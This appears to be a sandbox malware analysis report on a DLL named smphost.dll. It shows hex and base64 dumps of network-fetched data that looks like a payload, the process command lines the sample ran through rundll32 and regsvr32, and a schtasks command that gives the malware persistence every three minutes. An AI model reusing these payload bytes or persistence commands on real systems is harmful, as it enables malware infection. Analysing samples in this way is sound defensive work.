2022-01-30 12:33:36 UTC1303INData Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53
Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:33:36 UTC1319INData Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49
Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:33:36 UTC1335INData Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76
Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:33:36 UTC1351INData Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49
Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:33:36 UTC1367INData Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78
Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:33:36 UTC1383INData Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38
Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
2022-01-30 12:33:36 UTC1399INData Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c
Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:33:36 UTC1415INData Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39
Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:33:36 UTC1431INData Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51
Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:33:36 UTC1447INData Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71
Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq

Target ID:0
Start time:13:29:58
Start date:30/01/2022
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Imagebase:0xf30000
File size:116736 bytes
MD5 hash:7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:1
Start time:13:29:59
Start date:30/01/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:0xd80000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:13:29:59
Start date:30/01/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline:regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Imagebase:0x960000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:3
Start time:13:29:59
Start date:30/01/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:0x2d0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:4
Start time:13:29:59
Start date:30/01/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Imagebase:0x2d0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:10
Start time:13:30:02
Start date:30/01/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Imagebase:0x2d0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:14
Start time:13:30:06
Start date:30/01/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Imagebase:0x2d0000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:18
Start time:13:30:34
Start date:30/01/2022
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:0x13c0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:20
Start time:13:30:37
Start date:30/01/2022
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:0x7ff698e60000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:21
Start time:13:30:38
Start date:30/01/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -e C:\ProgramData\6\5507.ocx
Imagebase:0x960000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:27
Start time:13:30:50
Start date:30/01/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Imagebase:0x990000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:37
Start time:13:33:02
Start date:30/01/2022
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:0x7ff698e60000
File size:24064 bytes
MD5 hash:D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:38
Start time:13:33:02
Start date:30/01/2022
Path:C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):true
Commandline: -e C:\ProgramData\6\5507.ocx
Imagebase:0x960000
File size:20992 bytes
MD5 hash:426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language


    Execution Graph

    Execution Coverage:12%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:3.7%
    Total number of Nodes:1520
    Total number of Limit Nodes:14
10043 6e9ed945 _unexpected 14 API calls 10042->10043 10044 6e9ed738 10043->10044 10053 6e9ed758 10044->10053 10047->10034 10051 6e9ee99d LeaveCriticalSection 10048->10051 10050 6e9ed6f1 10050->10039 10051->10050 10052->10042 10056 6e9ee99d LeaveCriticalSection 10053->10056 10055 6e9ed746 10055->10004 10056->10055 10058 6e9ead5d 10057->10058 10059 6e9e8f25 10057->10059 10060 6e9ead6b 10058->10060 10065 6e9ebf60 10058->10065 10059->9836 10061 6e9ebf9b ___vcrt_FlsSetValue 6 API calls 10060->10061 10063 6e9ead7b 10061->10063 10070 6e9ead34 10063->10070 10066 6e9ebea1 ___vcrt_FlsSetValue 5 API calls 10065->10066 10067 6e9ebf7a 10066->10067 10068 6e9ebf92 TlsGetValue 10067->10068 10069 6e9ebf86 10067->10069 10068->10069 10069->10060 10071 6e9ead3e 10070->10071 10072 6e9ead4b 10070->10072 10071->10072 10074 6e9ec2b0 10071->10074 10072->10059 10075 6e9edc0e _free 14 API calls 10074->10075 10076 6e9ec2c8 10075->10076 10076->10072 10083 6e9ead94 10077->10083 10079 6e9e8f01 10079->9863 10080 6e9ed2f0 10079->10080 10081 6e9edb13 _free 14 API calls 10080->10081 10082 6e9e8f0d 10081->10082 10082->9861 10082->9862 10084 6e9ead9d 10083->10084 10085 6e9eada0 GetLastError 10083->10085 10084->10079 10086 6e9ebf60 ___vcrt_FlsGetValue 6 API calls 10085->10086 10088 6e9eadb5 10086->10088 10087 6e9eae1a SetLastError 10087->10079 10088->10087 10089 6e9ebf9b ___vcrt_FlsSetValue 6 API calls 10088->10089 10096 6e9eadd4 10088->10096 10090 6e9eadce CallUnexpected 10089->10090 10091 6e9eadf6 10090->10091 10092 6e9ebf9b ___vcrt_FlsSetValue 6 API calls 10090->10092 10090->10096 10093 6e9ebf9b ___vcrt_FlsSetValue 6 API calls 10091->10093 10094 6e9eae0a 10091->10094 10092->10091 10093->10094 10095 6e9ec2b0 ___std_exception_copy 14 API calls 10094->10095 10095->10096 10096->10087 10098 6e9e8f61 ___scrt_release_startup_lock 10097->10098 10099 6e9e8f65 10098->10099 10101 6e9e8f71 __DllMainCRTStartup@12 10098->10101 10100 6e9ed157 __DllMainCRTStartup@12 14 API calls 10099->10100 10102 6e9e8f6f 
10100->10102 10103 6e9e8f7e 10101->10103 10104 6e9ec801 CallUnexpected 23 API calls 10101->10104 10102->9871 10103->9871 10105 6e9ec957 10104->10105 10105->9871 10118 6e9ead11 InterlockedFlushSList 10106->10118 10110 6e9e910a 10109->10110 10111 6e9e9120 10110->10111 10122 6e9ed303 10110->10122 10115 6e9e949f 10111->10115 10113 6e9e9118 10114 6e9ea963 ___scrt_uninitialize_crt 7 API calls 10113->10114 10114->10111 10232 6e9e8f7f 10115->10232 10119 6e9e9a5c 10118->10119 10120 6e9ead21 10118->10120 10119->9875 10120->10119 10121 6e9ec2b0 ___std_exception_copy 14 API calls 10120->10121 10121->10120 10123 6e9ed30e 10122->10123 10124 6e9ed320 ___scrt_uninitialize_crt 10122->10124 10125 6e9ed31c 10123->10125 10127 6e9ee40a 10123->10127 10124->10113 10125->10113 10130 6e9ee2b8 10127->10130 10133 6e9ee20c 10130->10133 10134 6e9ee218 CallCatchBlock 10133->10134 10141 6e9ee955 EnterCriticalSection 10134->10141 10136 6e9ee28e 10150 6e9ee2ac 10136->10150 10137 6e9ee222 ___scrt_uninitialize_crt 10137->10136 10142 6e9ee180 10137->10142 10141->10137 10143 6e9ee18c CallCatchBlock 10142->10143 10153 6e9ec3df EnterCriticalSection 10143->10153 10145 6e9ee1cf 10164 6e9ee200 10145->10164 10146 6e9ee196 ___scrt_uninitialize_crt 10146->10145 10154 6e9ee3c2 10146->10154 10231 6e9ee99d LeaveCriticalSection 10150->10231 10152 6e9ee29a 10152->10125 10153->10146 10155 6e9ee3cf 10154->10155 10156 6e9ee3d8 10154->10156 10157 6e9ee2b8 ___scrt_uninitialize_crt 66 API calls 10155->10157 10167 6e9ee35d 10156->10167 10163 6e9ee3d5 10157->10163 10161 6e9ee3f4 10180 6e9f08a4 10161->10180 10163->10145 10230 6e9ec3f3 LeaveCriticalSection 10164->10230 10166 6e9ee1ee 10166->10137 10168 6e9ee375 10167->10168 10172 6e9ee39a 10167->10172 10169 6e9ee84d ___scrt_uninitialize_crt 25 API calls 10168->10169 10168->10172 10170 6e9ee393 10169->10170 10191 6e9f109c 10170->10191 10172->10163 10173 6e9ee84d 10172->10173 10174 6e9ee86e 10173->10174 10175 6e9ee859 10173->10175 10174->10161 10176 6e9ed46d _free 14 API 
calls 10175->10176 10177 6e9ee85e 10176->10177 10178 6e9ec24f ___std_exception_copy 25 API calls 10177->10178 10179 6e9ee869 10178->10179 10179->10161 10181 6e9f08b5 10180->10181 10182 6e9f08c2 10180->10182 10184 6e9ed46d _free 14 API calls 10181->10184 10183 6e9f090b 10182->10183 10186 6e9f08e9 10182->10186 10185 6e9ed46d _free 14 API calls 10183->10185 10190 6e9f08ba 10184->10190 10187 6e9f0910 10185->10187 10216 6e9f0802 10186->10216 10189 6e9ec24f ___std_exception_copy 25 API calls 10187->10189 10189->10190 10190->10163 10192 6e9f10a8 CallCatchBlock 10191->10192 10193 6e9f10b0 10192->10193 10196 6e9f10c8 10192->10196 10194 6e9ed45a __dosmaperr 14 API calls 10193->10194 10197 6e9f10b5 10194->10197 10195 6e9f1163 10198 6e9ed45a __dosmaperr 14 API calls 10195->10198 10196->10195 10201 6e9f10fa 10196->10201 10199 6e9ed46d _free 14 API calls 10197->10199 10200 6e9f1168 10198->10200 10215 6e9f10bd 10199->10215 10202 6e9ed46d _free 14 API calls 10200->10202 10203 6e9f14b6 ___scrt_uninitialize_crt EnterCriticalSection 10201->10203 10204 6e9f1170 10202->10204 10205 6e9f1100 10203->10205 10206 6e9ec24f ___std_exception_copy 25 API calls 10204->10206 10207 6e9f111c 10205->10207 10208 6e9f1131 10205->10208 10206->10215 10210 6e9ed46d _free 14 API calls 10207->10210 10209 6e9f118e ___scrt_uninitialize_crt 60 API calls 10208->10209 10211 6e9f112c 10209->10211 10212 6e9f1121 10210->10212 10214 6e9f115b ___scrt_uninitialize_crt LeaveCriticalSection 10211->10214 10213 6e9ed45a __dosmaperr 14 API calls 10212->10213 10213->10211 10214->10215 10215->10172 10217 6e9f080e CallCatchBlock 10216->10217 10218 6e9f14b6 ___scrt_uninitialize_crt EnterCriticalSection 10217->10218 10219 6e9f081d 10218->10219 10220 6e9f0864 10219->10220 10221 6e9f158d ___scrt_uninitialize_crt 25 API calls 10219->10221 10222 6e9ed46d _free 14 API calls 10220->10222 10223 6e9f0849 FlushFileBuffers 10221->10223 10224 6e9f0869 10222->10224 10223->10224 10225 6e9f0855 10223->10225 10227 6e9f0898 
___scrt_uninitialize_crt LeaveCriticalSection 10224->10227 10226 6e9ed45a __dosmaperr 14 API calls 10225->10226 10228 6e9f085a GetLastError 10226->10228 10229 6e9f0881 10227->10229 10228->10220 10229->10190 10230->10166 10231->10152 10237 6e9ed333 10232->10237 10235 6e9eae59 ___vcrt_uninitialize_ptd 6 API calls 10236 6e9e94a4 10235->10236 10236->9865 10240 6e9edbf4 10237->10240 10241 6e9edbfe 10240->10241 10242 6e9e8f86 10240->10242 10244 6e9ededb 10241->10244 10242->10235 10245 6e9eddba _unexpected 5 API calls 10244->10245 10246 6e9edef7 10245->10246 10247 6e9edf12 TlsFree 10246->10247 10248 6e9edf00 10246->10248 10248->10242 9106 6e9ecc7d 9117 6e9ef8d2 9106->9117 9111 6e9ecc9a 9114 6e9edc0e _free 14 API calls 9111->9114 9115 6e9eccc9 9114->9115 9118 6e9ef8db 9117->9118 9122 